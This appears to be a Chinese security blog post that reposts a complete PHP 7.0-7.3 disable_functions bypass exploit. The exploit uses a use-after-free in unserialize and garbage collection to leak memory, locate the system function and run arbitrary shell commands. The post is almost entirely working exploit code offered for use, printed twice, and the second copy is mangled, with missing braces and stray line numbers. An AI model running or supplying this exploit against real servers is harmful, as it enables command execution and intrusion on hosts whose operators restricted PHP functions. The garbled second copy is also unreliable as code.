PHP 7.0-7.3 disable_functions bypass

发表于 2019年10月25日
免杀 , 安全工具

目录表

PHP 7.0-7.3 disable_functions bypass

利用漏洞绕过disable_functions并执行系统命令。在Ubuntu/CentOS/FreeBSD系统服务中的cli/fpm/apache2环境php7.0-7.3版本上进行了测试，证明其工作可靠。

支持

7.0 - all versions to date
7.1 - all versions to date
7.2 - all versions to date
7.3 - all versions to date

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
# 
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    class ryat {
        var $ryat;
        var $chtg;
        
        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if you get segfaults

    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);

    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();

    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);

    exit();
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)

# Bug: https://bugs.php.net/bug.php?id=72530

# This exploit should work on all PHP 7.0-7.3 versions

# released as of 04/10/2019, specifically:

# PHP 7.0 - 7.0.33

# PHP 7.1 - 7.1.31

# PHP 7.2 - 7.2.23

# PHP 7.3 - 7.3.10

# Author: https://github.com/mm0r1

pwn("uname -a");

function pwn($cmd) {

global $abc, $helper;

function str2ptr(&$str, $p = 0, $s = 8) {

$address = 0;

for($j = $s-1; $j >= 0; $j--) {

$address <<= 8;

$address |= ord($str[$p+$j]);

}

return $address;

}

function ptr2str($ptr, $m = 8) {

$out = "";

for ($i=0; $i < $m; $i++) {

$out .= chr($ptr & 0xff);

$ptr >>= 8;

}

return $out;

}

function write(&$str, $p, $v, $n = 8) {

$i = 0;

for($i = 0; $i < $n; $i++) {

$str[$p + $i] = chr($v & 0xff);

$v >>= 8;

}

function leak($addr, $p = 0, $s = 8) {

global $abc, $helper;

write($abc, 0x68, $addr + $p - 0x10);

$leak = strlen($helper->a);

if($s != 8) { $leak %= 2 << ($s * 8) - 1; }

return $leak;

}

function parse_elf($base) {

$e_type = leak($base, 0x10, 2);

$e_phoff = leak($base, 0x20);

$e_phentsize = leak($base, 0x36, 2);

$e_phnum = leak($base, 0x38, 2);

for($i = 0; $i < $e_phnum; $i++) {

$header = $base + $e_phoff + $i * $e_phentsize;

$p_type = leak($header, 0, 4);

$p_flags = leak($header, 4, 4);

$p_vaddr = leak($header, 0x10);

$p_memsz = leak($header, 0x28);

if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write

# handle pie

$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;

$data_size = $p_memsz;

} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec

$text_size = $p_memsz;

}

if(!$data_addr || !$text_size || !$data_size)

return false;

return [$data_addr, $text_size, $data_size];

}

function get_basic_funcs($base, $elf) {

list($data_addr, $text_size, $data_size) = $elf;

for($i = 0; $i < $data_size / 8; $i++) {

$leak = leak($data_addr, $i * 8);

if($leak - $base > 0 && $leak - $base < $text_size) {

$deref = leak($leak);

# 'constant' constant check

if($deref != 0x746e6174736e6f63)

continue;

} else continue;

$leak = leak($data_addr, ($i + 4) * 8);

if($leak - $base > 0 && $leak - $base < $text_size) {

$deref = leak($leak);

# 'bin2hex' constant check

if($deref != 0x786568326e6962)

continue;

} else continue;

return $data_addr + $i * 8;

}

function get_binary_base($binary_leak) {

$base = 0;

$start = $binary_leak & 0xfffffffffffff000;

for($i = 0; $i < 0x1000; $i++) {

$addr = $start - 0x1000 * $i;

$leak = leak($addr, 0, 7);

if($leak == 0x10102464c457f) { # ELF header

return $addr;

}

function get_system($basic_funcs) {

$addr = $basic_funcs;

do {

$f_entry = leak($addr);

$f_name = leak($f_entry, 0, 6);

if($f_name == 0x6d6574737973) { # system

return leak($addr + 8);

}

$addr += 0x20;

} while($f_entry != 0);

return false;

}

class ryat {

var $ryat;

var $chtg;

function __destruct()

{

$this->chtg = $this->ryat;

$this->ryat = 1;

}

class Helper {

public $a, $b, $c, $d;

}

if(stristr(PHP_OS, 'WIN')) {

die('This PoC is for *nix systems only.');

}

$n_alloc = 10; # increase this value if you get segfaults

$contiguous = [];

for($i = 0; $i < $n_alloc; $i++)

$contiguous[] = str_repeat('A', 79);

$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';

$out = unserialize($poc);

gc_collect_cycles();

$v = [];

$v[0] = ptr2str(0, 79);

unset($v);

$abc = $out[2][0];

$helper = new Helper;

$helper->b = function ($x) { };

if(strlen($abc) == 79 || strlen($abc) == 0) {

die("UAF failed");

}

# leaks

$closure_handlers = str2ptr($abc, 0);

$php_heap = str2ptr($abc, 0x58);

$abc_addr = $php_heap - 0xc8;

# fake value

write($abc, 0x60, 2);

write($abc, 0x70, 6);

# fake reference

write($abc, 0x10, $abc_addr + 0x60);

write($abc, 0x18, 0xa);

$closure_obj = str2ptr($abc, 0x20);

$binary_leak = leak($closure_handlers, 8);

if(!($base = get_binary_base($binary_leak))) {

die("Couldn't determine binary base address");

}

if(!($elf = parse_elf($base))) {

die("Couldn't parse ELF header");

}

if(!($basic_funcs = get_basic_funcs($base, $elf))) {

die("Couldn't get basic_functions address");

}

if(!($zif_system = get_system($basic_funcs))) {

die("Couldn't get zif_system address");

}

# fake closure object

$fake_obj_offset = 0xd0;

for($i = 0; $i < 0x110; $i += 8) {

write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));

}

# pwn

write($abc, 0x20, $abc_addr + $fake_obj_offset);

write($abc, 0xd0 + 0x38, 1, 4); # internal func type

write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

($helper->b)($cmd);

exit();

}

关注：https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

标签：bypass , disable_functions 原文连接：PHP 7.0-7.3 disable_functions bypass 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

魔兽争霸RPG地图破解/解密三剑客 BurpSuite自动化blind-xss插件：Femida-xss